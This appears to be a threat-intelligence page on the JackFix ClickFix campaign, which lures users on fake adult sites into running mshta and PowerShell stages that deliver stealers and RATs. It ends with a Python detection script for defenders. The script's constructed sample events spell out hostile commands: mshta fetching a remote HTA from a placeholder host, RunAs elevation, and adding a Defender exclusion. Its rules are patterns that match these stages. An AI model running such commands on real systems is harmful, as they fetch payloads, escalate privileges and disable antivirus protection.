JackFix ClickFix fake-adult-site phishing campaign
Campaign
Summary
The JackFix campaign is using fake adult websites and ClickFix lures to trick users into running malicious commands, enabling an infection chain that can drop stealers and RATs. The operation disguises itself as a critical Windows security update and uses malvertising and other social-engineering routes to reach victims. Once users comply, the chain can launch mshta.exe and PowerShell stages that fetch additional payloads and evade analysis.
Related Happenings
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
Campaign
First: 11.03.2026 16:45
Last: 11.03.2026 16:45
Sources 1
About this happening:
A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...
MIMICRAT (aka AstarionRAT) ClickFix-delivered RAT activity
Malware Activity
First: 20.02.2026 13:55
Last: 20.02.2026 13:55
Sources 1
About this happening:
The **MIMICRAT (aka AstarionRAT)** malware has been disclosed as a **ClickFix-delivered RAT** that enables **Windows token impersonation** and **SOCKS5 tunneling**, increasing the...
ClickFix DNS-based nslookup staging campaign
Campaign
First: 15.02.2026 16:10
Last: 15.02.2026 16:10
Sources 1
About this happening:
The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...
Timeline
25.11.2025 16:18 2 articles · 6mo ago
JackFix ClickFix fake adult site campaign disclosed
Initial Disclosure
Cybersecurity researchers identified JackFix as a ClickFix campaign that uses fake adult websites and phony Windows Update full-screen lures to trick users into running mshta.exe commands that fetch PowerShell payloads. The chain uses obfuscation and anti-analysis measures, can elevate privileges with Start-Process and "-Verb RunAs", creates Microsoft Defender Antivirus exclusions, and can deliver loaders and RATs including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other payloads. A related Huntress-described chain also uses a ClickFix lure masquerading as Windows Update and steganography to hide shellcode in an embedded PNG, enabling Lumma or Rhadamanthys delivery.
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
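Detection logic for the stages named in the disclosure above (mshta.exe fetching remote content, PowerShell spawned from it, "-Verb RunAs" elevation, Defender exclusions), added here as an example and not taken from the cited reporting. The event field names, rule names and sample events are constructed, and matching exclusions on the Add-MpPreference/Set-MpPreference cmdlets is an assumption about how they are created.

```python
import ntpath
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed process-creation events (fields as in Sysmon Event ID 1); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": EXPLORER, "image": MSHTA,
     "cmdline": "mshta.exe https://update.example.invalid/kb.hta"},
    {"host": "ws-01", "parent": MSHTA, "image": PS,
     "cmdline": "powershell.exe -nop -c \"Start-Process powershell -Verb RunAs -ArgumentList '-File s.ps1'\""},
    {"host": "ws-01", "parent": PS, "image": PS,
     "cmdline": "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"host": "ws-02", "parent": EXPLORER, "image": MSHTA,
     "cmdline": "mshta.exe C:\\Apps\\inventory.hta"},   # local HTA, no URL
    {"host": "ws-02", "parent": EXPLORER, "image": PS,
     "cmdline": "powershell.exe Get-MpPreference"},      # read-only query
]

def _name(path):
    return ntpath.basename(path).lower()

def _is_ps(event):
    return _name(event["image"]) in ("powershell.exe", "pwsh.exe")

RULES = {
    "mshta_remote_url": lambda e: _name(e["image"]) == "mshta.exe"
        and re.search(r"https?://", e["cmdline"], re.I) is not None,
    "powershell_child_of_mshta": lambda e: _is_ps(e) and _name(e["parent"]) == "mshta.exe",
    "runas_elevation": lambda e: _is_ps(e)
        and re.search(r"start-process\b.*-verb\s+runas", e["cmdline"], re.I) is not None,
    # Assumption: exclusions are added through the Defender cmdlets' -Exclusion* parameters.
    "defender_exclusion": lambda e: re.search(
        r"\b(add|set)-mppreference\b.*-exclusion(path|extension|process)", e["cmdline"], re.I) is not None,
}

def detect(events):
    """Return (host, rule) for every rule that matches an event, in event order."""
    return [(e["host"], rule) for e in events for rule, match in RULES.items() if match(e)]

def hosts_with_chain(events, min_stages=3):
    """Hosts where at least min_stages distinct stages of the chain were seen."""
    stages = {}
    for host, rule in detect(events):
        stages.setdefault(host, set()).add(rule)
    return sorted(h for h, seen in stages.items() if len(seen) >= min_stages)
```

Correlating several stages per host keeps a lone local HTA or a read-only Defender query from alerting. Because the chain is described as obfuscated, literal command-line matching like this will miss encoded stages.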